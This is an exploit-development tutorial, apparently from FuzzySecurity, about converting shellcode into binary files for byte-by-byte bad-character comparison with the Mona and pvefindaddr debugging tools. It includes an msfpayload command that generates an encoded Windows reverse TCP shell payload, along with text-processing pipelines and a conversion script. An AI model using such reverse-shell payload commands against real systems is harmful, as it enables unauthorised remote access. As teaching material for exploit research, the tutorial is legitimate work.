
Writing shellcode to binary files

I have been doing a lot of exploit development recently. The g00ns out there with some exploits under their belt know that one of the biggest obstacles in the development process is badchars. Thank god for us corelanc0d3r has developed some tools which enable rapid, reliable exploit development (big shout-out to the corelan team!!). One of the features of Mona and pvefindaddr is the ability to compare shellcode in memory with the original version (byte per byte). Hence, if any bytes are mangled in memory we can easily flag them as badchars and re-encode our payload. To perform this analysis we need to store the original version of our shellcode in a binary file. This tutorial will walk you through that process. First we will do things “The Hard/Tedious Way” and then I’ll show you a small script I made to do things “The Easy Way”. Let’s get to it!!

For the purpose of this tutorial I’ll be working with Windows PE files (Portable Executable); however, these techniques work with other file-format payloads (such as PDFs), so use your imagination. I’ll also be using a high-end antivirus (ESET Smart Security 5, none of that AVG bull!#*t hehe), updated with the latest virus signature database.

(1) The Hard Way

First we need some sample shellcode. You can use shellcode from a pre-existing exploit or generate some with the metasploit framework. For the purpose of this tutorial we’ll be generating it with msf and writing it to a text file…

root@bt:~/Desktop# msfpayload windows/shell/reverse_tcp LHOST=192.168.98.64 LPORT=9988 R |msfencode -e x86/alpha_mixed -b "\x00" -t c >> test.txt

[*] x86/alpha_mixed succeeded with size 642 (iteration=1)

[Screenshot: Shellcode]

As you might have guessed, the current shellcode format is not suitable for our purposes. Let’s fix that with some cat-grep-tr-sed kung-fu. We need to transform our shellcode from this “\x89\xe5\xdb” to this “89e5db”. This magic might need some clarification: (1) with grep we keep only the lines that contain a double quote ("), (2) tr -d " " removes all spaces, (3) tr -d "\n" removes all newlines and (4) sed deletes the remaining wrapper characters (\, ", x and ;). The result is a clean string of the raw hex bytes.

root@bt:~/Desktop# cat test.txt |grep '"' |tr -d " " |tr -d "\n" |sed 's/[\"x;]//g'


So far so good; let’s create a template binary file by echoing some rubbish into it. After that we can open it in hexeditor for further manipulation.

root@bt:~/Desktop# echo "boring" >> template.bin

root@bt:~/Desktop# hexeditor -b template.bin

[Screenshot: Hexeditor]

Now we need to add space for our shellcode: hold down “Ctrl-a” to insert empty space (be sure to add enough; don’t worry if it’s too much). Copy the buffer we created above and paste it into the empty space with “Shift-Insert”. After that is done, delete the excess space and the junk we echoed into the binary file. You can see these three phases in the screenshots below.

[Screenshots: Hex-Empty, Hex-Paste, Hex-Saved]

All that remains now is to press “Ctrl-x” to close and save the binary file. That’s all there is to it. While this isn’t really hard, it is certainly tedious, especially if we have to redo this process several times.


(2) The Easy Way

I thought to myself: why waste two minutes of my life each time I have to create a *.bin file? After a bit of research I created a small script to do all the work for me. Just execute the script without any parameters to see the menu. You can download it from the coding page.

root@bt:~/Desktop# ./bin.sh
--------------------------------------------------------------------
|                          Bin v1.0 ~ b33f                         |
|                  -Convert you shellcode to *.bin-                |
--------------------------------------------------------------------
| USAGE: ./bin.sh -i [Input File] -o [Output File] -t [B/Z]        |
|                                                                  |
| REQUIRED                                                         |
|         -i  Input (text) file containing the shellcode.          |
|         -o  Output filename without extention (eg: shell).       |
|         -t  Type can be B (regular bin file) or Z (zipped.       |
|             bin file).                                           |
|                                                                  |
| DETAILS                                                          |
|         The input text file should just contain the shellcode.   |
|         If you are using msfpayload (possibly/probably in        |
|         combinatione with msfencode) set the output type to      |
|         c or perl. If you have some shellcode in an exploit      |
|         just copy it to a text file...                           |
--------------------------------------------------------------------


The script has some error tolerance for sloppy-copy use. It should filter out junk characters when copying from the most common exploit formats (Python, Perl, C). When using msfpayload/msfencode you can set the output type to perl or c. Feel free to add some filtering rules (email me if you have any suggestions). The rule of thumb is to copy as cleanly as possible and then check the contents of the binary file. I also added an option to zip the resulting binary file; the reason is that I usually transfer files to my debugging machine via an Apache server, and Internet Explorer doesn’t like binary files much.
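As an added example (not the page’s bin.sh and not the author’s pipeline), here is a POSIX shell script that does the job of both sections above: it pulls the \xHH bytes out of a C/Perl/Python-formatted text file, as the grep/tr/sed pipeline in “The Hard Way” does, and writes them straight to a .bin file as bin.sh does, with a size check so a sloppy copy cannot silently produce a short file. The sample input, file names and function names are constructed for the demo.

```shell
#!/bin/sh
# Added example, not the bin.sh from the page: turn "\xHH"-formatted
# shellcode (msfencode -t c / -t perl output, or a paste from a Python
# exploit) into a raw .bin that mona/pvefindaddr can compare against
# memory byte for byte.

# Print the payload as one lowercase hex string, taking only the \xHH
# tokens in order. Quotes, variable names, '+'/'.' concatenation and
# comments are skipped, which is what makes a "sloppy copy" harmless.
extract_hex() {
    grep -o '\\x[0-9a-fA-F][0-9a-fA-F]' "$1" | cut -c3-4 | tr -d '\n' | tr 'A-F' 'a-f'
}

# Read a hex string on stdin and write the raw bytes to stdout. printf
# with an octal escape is used so the script does not depend on xxd.
hex_to_bin() {
    h=$(cat)
    while [ -n "$h" ]; do
        byte=${h%"${h#??}"}   # first two hex digits
        h=${h#??}             # drop them
        printf "\\$(printf '%03o' "0x$byte")"
    done
}

# shellcode_to_bin INPUT.txt OUTPUT.bin: convert and print the byte
# count. Fails when no \xHH tokens were found or the size does not match.
shellcode_to_bin() {
    hex=$(extract_hex "$1")
    [ -n "$hex" ] || { echo "no \\xHH shellcode found in $1" >&2; return 1; }
    printf '%s' "$hex" | hex_to_bin > "$2"
    expected=$(( ${#hex} / 2 ))
    written=$(wc -c < "$2" | tr -d ' ')
    [ "$written" -eq "$expected" ] || { echo "size mismatch writing $2" >&2; return 1; }
    echo "$written"
}

# Demo on a constructed sample (not real shellcode): Python-style lines
# with a comment and concatenation, as you would see in a copied exploit.
demo() {
    dir=$(mktemp -d)
    cat > "$dir/badchars.txt" <<'EOF'
# constructed sample for the demo
shellcode  = "\x90\x90\xcc"   # nops + int3
shellcode += "\x00\xff\x41"
EOF
    shellcode_to_bin "$dir/badchars.txt" "$dir/badchars.bin"
    od -An -tx1 "$dir/badchars.bin" | tr -d ' \n'; echo
}
```

A byte count that differs from the size msfencode reported (642 in the run above) means the copy lost or gained bytes before the file ever reached the debugger.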


Time for a demonstration!! For the sake of diversity I’ll be using some shellcode from an exploit I developed recently. First I copy the shellcode into a text file (badchars.txt). See the screenshots below, and notice that my sloppy copy doesn’t affect the script…

[Screenshots: Egg Hunter sample shellcode, Egg Hunter paste]

All that’s left to do is run the script and check out the results in the hexeditor. Enjoy all those precious minutes you’ll be saving every time you develop an exploit ;))…

[Screenshot: Hexeditor output]

© Copyright FuzzySecurity
